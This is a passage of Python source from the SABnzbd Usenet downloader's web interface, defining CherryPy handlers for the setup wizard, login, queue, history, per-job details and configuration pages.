del_hist_job(job, del_files=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
# Duplicate of History/retry_pp to please the SMPL skin :(
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise Raiser(self.__root)
@secured_expose
def robots_txt(self, **kwargs):
""" Keep web crawlers out """
cherrypy.response.headers['Content-Type'] = 'text/plain'
return 'User-agent: *\nDisallow: /\n'
##############################################################################
class Wizard:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
""" Show the language selection page """
if sabnzbd.WIN32:
import util.apireg
cfg.language.set(util.apireg.get_install_lng())
logging.debug('Installer language code "%s"', cfg.language())
info = build_header(sabnzbd.WIZARD_DIR)
info['languages'] = list_languages()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'index.html'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def one(self, **kwargs):
""" Accept language and show server page """
if kwargs.get('lang'):
cfg.language.set(kwargs.get('lang'))
# Always setup Glitter
change_web_dir('Glitter - Default')
info = build_header(sabnzbd.WIZARD_DIR)
info['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
# Just in case, add server
servers = config.get_servers()
if not servers:
info['host'] = ''
info['port'] = ''
info['username'] = ''
info['password'] = ''
info['connections'] = ''
info['ssl'] = 0
info['ssl_verify'] = 2
else:
# Sort servers to get the first enabled one
server_names = sorted(servers.keys(), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for server in server_names:
# If there are multiple servers, just use the first enabled one
s = servers[server]
info['host'] = s.host()
info['port'] = s.port()
info['username'] = s.username()
info['password'] = s.password.get_stars()
info['connections'] = s.connections()
info['ssl'] = s.ssl()
info['ssl_verify'] = s.ssl_verify()
if s.enable():
break
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'one.html'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def two(self, **kwargs):
""" Accept server and show the final page for restart """
# Save server details
if kwargs:
kwargs['enable'] = 1
handle_server(kwargs)
config.save_config()
# Show Restart screen
info = build_header(sabnzbd.WIZARD_DIR)
info['access_url'], info['urls'] = get_access_info()
info['download_dir'] = cfg.download_dir.get_clipped_path()
info['complete_dir'] = cfg.complete_dir.get_clipped_path()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'two.html'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose
def exit(self, **kwargs):
""" Stop SABnzbd """
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
def get_access_info():
""" Build up a list of url's that sabnzbd can be accessed from """
# Access_url is used to provide the user a link to sabnzbd depending on the host
access_uri = 'localhost'
cherryhost = cfg.cherryhost()
if cherryhost == '0.0.0.0':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
try:
addresses = socket.getaddrinfo(host, None)
except:
addresses = []
for addr in addresses:
address = addr[4][0]
# Filter out ipv6 addresses (should not be allowed)
if ':' not in address and address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif cherryhost == '::':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
addresses = socket.getaddrinfo(host, None)
for addr in addresses:
address = addr[4][0]
# Only ipv6 addresses will work
if ':' in address:
address = '[%s]' % address
if address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif not cherryhost:
socks = [socket.gethostname()]
access_uri = socket.gethostname()
else:
socks = [cherryhost]
access_uri = cherryhost
urls = []
for sock in socks:
if sock:
if cfg.enable_https() and cfg.https_port():
url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
url = 'https://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
else:
url = 'http://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
urls.append(url)
if cfg.enable_https() and cfg.https_port():
access_url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
access_url = 'https://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
else:
access_url = 'http://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
return access_url, urls
##############################################################################
class LoginPage:
@cherrypy.expose
def index(self, **kwargs):
# Base output var
info = build_header(sabnzbd.WEB_DIR_CONFIG)
info['error'] = ''
# Logout?
if kwargs.get('logout'):
set_login_cookie(remove=True)
raise Raiser()
# Check if there's even a username/password set
if check_login():
raise Raiser(cherrypy.request.script_name + '/')
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
# Check login info
if kwargs.get('username') == cfg.username() and kwargs.get('password') == cfg.password():
# Save login cookie
set_login_cookie(remember_me=kwargs.get('remember_me', False))
            # Log the success
if xff:
logging.info('Successful login from %s (X-Forwarded-For: %s)', cherrypy.request.remote.ip, xff)
else:
logging.info('Successful login from %s', cherrypy.request.remote.ip)
# Redirect
raise Raiser(cherrypy.request.script_name + '/')
elif kwargs.get('username') or kwargs.get('password'):
info['error'] = T('Authentication failed, check username/password.')
# Warn about the potential security problem
fail_msg = T('Unsuccessful login attempt from %s') % cherrypy.request.remote.ip
if xff:
fail_msg = '%s (X-Forwarded-For: %s)' % (fail_msg, xff)
logging.warning(fail_msg)
# Show login
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'login', 'main.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
##############################################################################
class NzoPage:
def __init__(self, root):
self.__root = root
self.__cached_selection = {} # None
@secured_expose
def default(self, *args, **kwargs):
# Allowed URL's
# /nzb/SABnzbd_nzo_xxxxx/
# /nzb/SABnzbd_nzo_xxxxx/details
# /nzb/SABnzbd_nzo_xxxxx/files
# /nzb/SABnzbd_nzo_xxxxx/bulk_operation
# /nzb/SABnzbd_nzo_xxxxx/save
nzo_id = None
for a in args:
if a.startswith('SABnzbd_nzo'):
nzo_id = a
break
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo_id and nzo:
info, pnfo_list, bytespersec, q_size, bytes_left_previous_page = build_queue_header()
# /SABnzbd_nzo_xxxxx/bulk_operation
if 'bulk_operation' in args:
return self.bulk_operation(nzo_id, kwargs)
# /SABnzbd_nzo_xxxxx/details
elif 'details' in args:
info = self.nzo_details(info, pnfo_list, nzo_id)
# /SABnzbd_nzo_xxxxx/files
elif 'files' in args:
info = self.nzo_files(info, nzo_id)
# /SABnzbd_nzo_xxxxx/save
elif 'save' in args:
self.save_details(nzo_id, args, kwargs)
return # never reached
# /SABnzbd_nzo_xxxxx/
else:
info = self.nzo_details(info, pnfo_list, nzo_id)
info = self.nzo_files(info, nzo_id)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'nzo.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
else:
# Job no longer exists, go to main page
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def nzo_details(self, info, pnfo_list, nzo_id):
slot = {}
n = 0
for pnfo in pnfo_list:
if pnfo.nzo_id == nzo_id:
nzo = NzbQueue.do.get_nzo(nzo_id)
repair = pnfo.repair
unpack = pnfo.unpack
delete = pnfo.delete
unpackopts = sabnzbd.opts_to_pp(repair, unpack, delete)
script = pnfo.script
if script is None:
script = 'None'
cat = pnfo.category
if not cat:
cat = 'None'
filename_pw = nzo.final_name_pw_clean
filename = nzo.final_name
priority = pnfo.priority
slot['nzo_id'] = str(nzo_id)
slot['cat'] = cat
slot['filename'] = filename_pw
slot['filename_clean'] = filename
slot['password'] = nzo.password or ''
slot['script'] = script
slot['priority'] = str(priority)
slot['unpackopts'] = str(unpackopts)
info['index'] = n
break
n += 1
info['slot'] = slot
info['scripts'] = list_scripts()
info['categories'] = list_cats()
info['noofslots'] = len(pnfo_list)
return info
def nzo_files(self, info, nzo_id):
active = []
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo:
pnfo = nzo.gather_info(full=True)
info['nzo_id'] = pnfo.nzo_id
info['filename'] = pnfo.filename
for nzf in pnfo.active_files:
checked = False
if nzf.nzf_id in self.__cached_selection and \
self.__cached_selection[nzf.nzf_id] == 'on':
checked = True
active.append({'filename': nzf.filename if nzf.filename else nzf.subject,
'mbleft': "%.2f" % (nzf.bytes_left / MEBI),
'mb': "%.2f" % (nzf.bytes / MEBI),
'size': format_bytes(nzf.bytes),
'sizeleft': format_bytes(nzf.bytes_left),
'nzf_id': nzf.nzf_id,
'age': calc_age(nzf.date),
'checked': checked})
info['active_files'] = active
return info
def save_details(self, nzo_id, args, kwargs):
index = kwargs.get('index', None)
name = kwargs.get('name', None)
password = kwargs.get('password', None)
if password == "":
password = None
pp = kwargs.get('pp', None)
script = kwargs.get('script', None)
cat = kwargs.get('cat', None)
priority = kwargs.get('priority', None)
nzo = NzbQueue.do.get_nzo(nzo_id)
if index is not None:
NzbQueue.do.switch(nzo_id, index)
if name is not None:
NzbQueue.do.change_name(nzo_id, name, password)
        if cat is not None and nzo.cat != cat and not (nzo.cat == '*' and cat == 'Default'):
NzbQueue.do.change_cat(nzo_id, cat, priority)
# Category changed, so make sure "Default" attributes aren't set again
if script == 'Default':
script = None
if priority == 'Default':
priority = None
if pp == 'Default':
pp = None
if script is not None and nzo.script != script:
NzbQueue.do.change_script(nzo_id, script)
if pp is not None and nzo.pp != pp:
NzbQueue.do.change_opts(nzo_id, pp)
if priority is not None and nzo.priority != int(priority):
NzbQueue.do.set_priority(nzo_id, priority)
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def bulk_operation(self, nzo_id, kwargs):
self.__cached_selection = kwargs
if kwargs['action_key'] == 'Delete':
for key in kwargs:
if kwargs[key] == 'on':
NzbQueue.do.remove_nzf(nzo_id, key, force_delete=True)
elif kwargs['action_key'] in ('Top', 'Up', 'Down', 'Bottom'):
nzf_ids = []
for key in kwargs:
if kwargs[key] == 'on':
nzf_ids.append(key)
size = int_conv(kwargs.get('action_size', 1))
if kwargs['action_key'] == 'Top':
NzbQueue.do.move_top_bulk(nzo_id, nzf_ids)
elif kwargs['action_key'] == 'Up':
NzbQueue.do.move_up_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Down':
NzbQueue.do.move_down_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Bottom':
NzbQueue.do.move_bottom_bulk(nzo_id, nzf_ids)
if NzbQueue.do.get_nzo(nzo_id):
url = cherrypy.lib.httputil.urljoin(self.__root, nzo_id)
else:
url = cherrypy.lib.httputil.urljoin(self.__root, '../queue')
if url and not url.endswith('/'):
url += '/'
raise Raiser(url)
##############################################################################
class QueuePage:
def __init__(self, root):
self.__root = root
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
info, _pnfo_list, _bytespersec = build_queue(start=start, limit=limit, trans=True, search=search)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'queue.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
uid = kwargs.get('uid')
del_files = int_conv(kwargs.get('del_files'))
if uid:
NzbQueue.do.remove(uid, add_to_history=False, delete_all_data=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
NzbQueue.do.remove_all(kwargs.get('search'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_queue_complete_action(self, **kwargs):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
"""
action = kwargs.get('action')
sabnzbd.change_queue_complete_action(action)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def switch(self, **kwargs):
uid1 = kwargs.get('uid1')
uid2 = kwargs.get('uid2')
if uid1 and uid2:
NzbQueue.do.switch(uid1, uid2)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_opts(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
pp = kwargs.get('pp', '')
if nzo_id and pp and pp.isdigit():
NzbQueue.do.change_opts(nzo_id, int(pp))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_script(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
script = kwargs.get('script', '')
if nzo_id and script:
if script == 'None':
script = None
NzbQueue.do.change_script(nzo_id, script)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_cat(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
cat = kwargs.get('cat', '')
if nzo_id and cat:
if cat == 'None':
cat = None
NzbQueue.do.change_cat(nzo_id, cat)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def pause_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.pause_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.resume_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def set_priority(self, **kwargs):
NzbQueue.do.set_priority(kwargs.get('nzo_id'), kwargs.get('priority'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_avg_age(self, **kwargs):
NzbQueue.do.sort_queue('avg_age', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_name(self, **kwargs):
NzbQueue.do.sort_queue('name', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_size(self, **kwargs):
NzbQueue.do.sort_queue('size', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
##############################################################################
class HistoryPage:
def __init__(self, root):
self.__root = root
self.__failed_only = False
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
failed_only = kwargs.get('failed_only')
if failed_only is None:
failed_only = self.__failed_only
history = build_header()
history['failed_only'] = failed_only
history['rating_enable'] = bool(cfg.rating_enable())
postfix = T('B') # : Abbreviation for bytes, as in GB
grand, month, week, day = BPSMeter.do.get_sums()
history['total_size'], history['month_size'], history['week_size'], history['day_size'] = \
to_units(grand, postfix=postfix), to_units(month, postfix=postfix), \
to_units(week, postfix=postfix), to_units(day, postfix=postfix)
history['lines'], history['fetched'], history['noofslots'] = build_history(limit=limit, start=start, search=search, failed_only=failed_only)
if search:
history['search'] = escape(search)
else:
history['search'] = ''
history['start'] = int_conv(start)
history['limit'] = int_conv(limit)
history['finish'] = history['start'] + history['limit']
if history['finish'] > history['noofslots']:
history['finish'] = history['noofslots']
if not history['finish']:
history['finish'] = history['fetched']
history['time_format'] = time_format
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'history.tmpl'),
searchList=[history], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
history_db = sabnzbd.get_db_connection()
history_db.remove_history()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
job = kwargs.get('job')
del_files = int_conv(kwargs.get('del_files'))
if job:
jobs = job.split(',')
for job in jobs:
del_hist_job(job, del_files=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_all(self, **kwargs):
retry_all_jobs()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def reset(self, **kwargs):
# sabnzbd.reset_byte_counter()
raise queueRaiser(self.__root, kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
##############################################################################
class ConfigPage:
def __init__(self, root):
self.__root = root
self.folders = ConfigFolders('/config/folders/')
self.notify = ConfigNotify('/config/notify/')
self.general = ConfigGeneral('/config/general/')
self.rss = ConfigRss('/config/rss/')
self.scheduling = ConfigScheduling('/config/scheduling/')
self.server = ConfigServer('/config/server/')
self.switches = ConfigSwitches('/config/switches/')
self.categories = ConfigCats('/config/categories/')
self.sorting = ConfigSorting('/config/sorting/')
self.special = ConfigSpecial('/config/special/')
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = clip_path(config.get_filename())
conf['cmdline'] = sabnzbd.CMDLINE
conf['build'] = sabnzbd.version.__baseline__[:7]
conf['have_unzip'] = bool(sabnzbd.newsunpack.ZIP_COMMAND)
conf['have_7zip'] = bool(sabnzbd.newsunpack.SEVEN_COMMAND)
conf['have_sabyenc'] = SABYENC_ENABLED
conf['have_mt_par2'] = sabnzbd.newsunpack.PAR2_MT
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
conf['ssl_version'] = ssl.OPENSSL_VERSION
new = {}
for svr in config.get_servers():
new[svr] = {}
conf['servers'] = new
conf['folders'] = NzbQueue.do.scan_jobs(all=False, action=False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def restart(self, **kwargs):
logging.info('Restart requested by interface')
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait for about 5 second and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
@secured_expose(check_session_key=True)
def repair(self, **kwargs):
logging.info('Queue repair requested by interface')
sabnzbd.request_repair()
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait for about 5 second and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
##############################################################################
LIST_DIRPAGE = (
'download_dir', 'download_free', 'complete_dir', 'admin_dir',
'nzb_backup_dir', 'dirscan_dir', 'dirscan_speed', 'script_dir',
'email_dir', 'permissions', 'log_dir', 'password_file'
)
class ConfigFolders:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
for kw in LIST_DIRPAGE:
conf[kw] = config.get_config('misc', kw)()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_folders.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveDirectories(self, **kwargs):
for kw in LIST_DIRPAGE:
value = kwargs.get(kw)
if value is not None:
if kw in ('complete_dir', 'dirscan_dir'):
msg = config.get_config('misc', kw).set(value, create=True)
else:
msg = config.get_config('misc', kw).set(value)
if msg:
# return sabnzbd.api.report('json', error=msg)
return badParameterResponse(msg, kwargs.get('ajax'))
sabnzbd.check_incomplete_vs_complete()
config.save_config()
if kwargs.get('ajax'):
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
##############################################################################
SWITCH_LIST = \
('par_option', 'top_only', 'direct_unpack', 'enable_meta', 'win_process_prio',
'auto_sort', 'propagation_delay', 'auto_disconnect', 'flat_unpack',
'safe_postproc', 'no_dupes', 'replace_spaces', 'replace_dots',
'ignore_samples', 'pause_on_post_processing', 'nice', 'ionice',
'pre_script', 'pause_on_pwrar', 'sfv_check', 'folder_rename', 'load_balancing',
'quota_size', 'quota_day', 'quota_resume', 'quota_period', 'history_retention',
'pre_check', 'max_art_tries', 'fail_hopeless_jobs', 'enable_all_par',
'enable_recursive', 'no_series_dupes', 'series_propercheck', 'script_can_fail',
'new_nzb_on_failure', 'unwanted_extensions', 'action_on_unwanted_extensions', 'sanitize_safe',
'rating_enable', 'rating_api_key', 'rating_filter_enable',
'rating_filter_abort_audio', 'rating_filter_abort_video', 'rating_filter_abort_encrypted',
'rating_filter_abort_encrypted_confirm', 'rating_filter_abort_spam', 'rating_filter_abort_spam_confirm',
'rating_filter_abort_downvoted', 'rating_filter_abort_keywords',
'rating_filter_pause_audio', 'rating_filter_pause_video', 'rating_filter_pause_encrypted',
'rating_filter_pause_encrypted_confirm', 'rating_filter_pause_spam', 'rating_filter_pause_spam_confirm',
'rating_filter_pause_downvoted', 'rating_filter_pause_keywords'
)
class ConfigSwitches:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
conf['have_nice'] = bool(sabnzbd.newsunpack.NICE_COMMAND)
conf['have_ionice'] = bool(sabnzbd.newsunpack.IONICE_COMMAND)
conf['cleanup_list'] = cfg.cleanup_list.get_string()
for kw in SWITCH_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['unwanted_extensions'] = cfg.unwanted_extensions.get_string()
conf['scripts'] = list_scripts() or ['None']
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_switches.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSwitches(self, **kwargs):
for kw in SWITCH_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
if kw == 'unwanted_extensions' and value:
value = value.lower().replace('.', '')
msg = item.set(value)
if msg:
return badParameterResponse(msg)
cleanup_list = kwargs.get('cleanup_list')
if cleanup_list and sabnzbd.WIN32:
cleanup_list = cleanup_list.lower()
cfg.cleanup_list.set(cleanup_list)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SPECIAL_BOOL_LIST = \
('start_paused', 'no_penalties', 'fast_fail', 'ignore_wrong_unrar', 'overwrite_files', 'enable_par_cleanup',
'queue_complete_pers', 'api_warnings', 'ampm', 'enable_unrar', 'enable_unzip', 'enable_7zip',
'enable_filejoin', 'enable_tsjoin', 'ignore_unrar_dates', 'debug_log_decoding',
'multipar', 'osx_menu', 'osx_speed', 'win_menu', 'allow_incomplete_nzb',
'rss_filenames', 'ipv6_hosting', 'keep_awake', 'empty_postproc', 'html_login', 'wait_for_dfolder',
'max_art_opt', 'warn_empty_nzb', 'enable_bonjour', 'reject_duplicate_files', 'warn_dupl_jobs',
'replace_illegal', 'backup_for_duplicates', 'disable_api_key', 'api_logging',
'ignore_empty_files', 'x_frame_options', 'require_modern_tls'
)
SPECIAL_VALUE_LIST = \
('size_limit', 'movie_rename_limit', 'nomedia_marker', 'max_url_retries', 'req_completion_rate', 'wait_ext_drive',
'show_sysload', 'url_base', 'direct_unpack_threads', 'ipv6_servers', 'selftest_host', 'rating_host'
)
SPECIAL_LIST_LIST = ('rss_odd_titles', 'quick_check_ext_ignore', 'host_whitelist')
class ConfigSpecial:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['switches'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_BOOL_LIST]
conf['entries'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_VALUE_LIST]
conf['entries'].extend([(kw, config.get_config('misc', kw).get_string(), config.get_config('misc', kw).default_string()) for kw in SPECIAL_LIST_LIST])
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_special.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSpecial(self, **kwargs):
for kw in SPECIAL_BOOL_LIST + SPECIAL_VALUE_LIST + SPECIAL_LIST_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
GENERAL_LIST = (
'host', 'port', 'username', 'refresh_rate', 'language', 'cache_limit',
'local_ranges', 'inet_exposure', 'enable_https', 'https_port',
'https_cert', 'https_key', 'https_chain', 'enable_https_verification',
'auto_browser', 'check_new_rel'
)
class ConfigGeneral:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def ListColors(web_dir):
lst = []
web_dir = os.path.join(sabnzbd.DIR_INTERFACES, web_dir)
dd = os.path.abspath(web_dir + '/templates/static/stylesheets/colorschemes')
if (not dd) or (not os.access(dd, os.R_OK)):
return lst
for color in globber(dd):
col = color.replace('.css', '')
lst.append(col)
return lst
def add_color(skin_dir, color):
if skin_dir:
if not color:
try:
color = DEF_SKIN_COLORS[skin_dir.lower()]
except KeyError:
return skin_dir
return '%s - %s' % (skin_dir, color)
else:
return ''
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = config.get_filename()
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
wlist = []
interfaces = globber_full(sabnzbd.DIR_INTERFACES)
        for k in interfaces[:]:  # iterate over a copy because entries are removed below
if k.endswith(DEF_STDCONFIG):
interfaces.remove(k)
continue
for web in interfaces:
rweb = os.path.basename(web)
if os.access(os.path.join(web, DEF_MAIN_TMPL), os.R_OK):
cols = ListColors(rweb)
if cols:
for col in cols:
wlist.append(add_color(rweb, col))
else:
wlist.append(rweb)
conf['web_list'] = wlist
conf['web_dir'] = add_color(cfg.web_dir(), cfg.web_color())
conf['password'] = cfg.password.get_stars()
conf['language'] = cfg.language()
lang_list = list_languages()
if len(lang_list) < 2:
lang_list = []
conf['lang_list'] = lang_list
for kw in GENERAL_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['bandwidth_max'] = cfg.bandwidth_max()
conf['bandwidth_perc'] = cfg.bandwidth_perc()
conf['nzb_key'] = cfg.nzb_key()
conf['local_ranges'] = cfg.local_ranges.get_string()
conf['my_lcldata'] = cfg.admin_dir.get_clipped_path()
conf['caller_url'] = cherrypy.request.base + cfg.url_base()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_general.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveGeneral(self, **kwargs):
# Handle general options
for kw in GENERAL_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
# Handle special options
cfg.password.set(kwargs.get('password'))
web_dir = kwargs.get('web_dir')
change_web_dir(web_dir)
bandwidth_max = kwargs.get('bandwidth_max')
if bandwidth_max is not None:
cfg.bandwidth_max.set(bandwidth_max)
bandwidth_perc = kwargs.get('bandwidth_perc')
if bandwidth_perc is not None:
cfg.bandwidth_perc.set(bandwidth_perc)
bandwidth_perc = cfg.bandwidth_perc()
if bandwidth_perc and not bandwidth_max:
logging.warning(T('You must set a maximum bandwidth before you can set a bandwidth limit'))
config.save_config()
# Update CherryPy authentication
set_auth(cherrypy.config)
if kwargs.get('ajax'):
return sabnzbd.api.report('json', data={'success': True, 'restart_req': sabnzbd.RESTART_REQ})
else:
raise Raiser(self.__root)
def change_web_dir(web_dir):
try:
web_dir, web_color = web_dir.split(' - ')
except:
try:
web_color = DEF_SKIN_COLORS[web_dir.lower()]
except:
web_color = ''
web_dir_path = real_path(sabnzbd.DIR_INTERFACES, web_dir)
if not os.path.exists(web_dir_path):
return badParameterResponse('Cannot find web template: %s' % web_dir_path)
else:
cfg.web_dir.set(web_dir)
cfg.web_color.set(web_color)
##############################################################################
class ConfigServer:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
new = []
servers = config.get_servers()
server_names = sorted(list(servers.keys()), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for svr in server_names:
new.append(servers[svr].get_dict(safe=True))
t, m, w, d, timeline = BPSMeter.do.amounts(svr)
if t:
new[-1]['amounts'] = to_units(t), to_units(m), to_units(w), to_units(d), timeline
conf['servers'] = new
conf['cats'] = list_cats(default=True)
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
